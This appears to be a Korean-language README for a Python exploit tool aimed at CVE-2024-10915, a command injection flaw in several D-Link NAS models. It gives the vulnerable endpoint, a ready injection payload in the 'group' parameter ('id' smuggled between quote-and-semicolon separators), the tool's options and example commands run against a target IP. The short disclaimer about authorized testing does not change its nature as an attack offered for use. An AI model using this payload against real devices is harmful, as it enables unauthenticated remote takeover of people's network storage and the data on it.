
CVE-2024-10915를 위한 Python 기반 익스플로잇, D-Link NAS 장치의 명령어 삽입 취약점입니다. 승인된 보안 테스트를 위해 /cgi-bin/account_mgr.cgi 엔드포인트를 통해 임의의 시스템 명령을 실행합니다.
이 Python 기반 익스플로잇은 /cgi-bin/account_mgr.cgi?cmd=cgi_user_add 엔드포인트를 통해 여러 D-Link NAS 제품의 명령 주입 취약점을 대상으로 합니다. 이 취약점은 인증되지 않은 공격자가 영향을 받는 장치에서 임의 시스템 명령을 실행할 수 있게 합니다.
CVE-2024-10915는 여러 D-Link NAS 모델에 영향을 미칩니다. 공격자는 cgi_user_add 명령의 group 매개변수를 통해 명령을 주입하여 원격 코드 실행을 유발할 수 있습니다.
D-Link DNS-320
D-Link DNS-320LW
D-Link DNS-325
D-Link DNS-340L
취약한 엔드포인트: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
Python 3.x
requests library
필수 종속성 설치:
pip3 install requests
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
| 옵션 | 설명 |
|---|---|
-u / --url | 대상 기본 URL (예: http://192.168.1.100) |
-c / --command | 장치에서 실행할 명령 (기본값: id) |
-p / --proxy | HTTP 프록시 사용 (예: http://127.0.0.1:8080) |
-o / --output | HTTP 응답을 파일로 저장 |
-l / --list | 영향을 받는 D-Link NAS 제품 나열 |
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt

이 프로젝트는 교육 및 승인된 테스트 목적으로만 제공됩니다. 명시적 권한이 없는 네트워크나 시스템에서 이 도구를 사용하지 마십시오. 저자는 어떠한 오용이나 피해에 대해서도 책임을 지지 않습니다.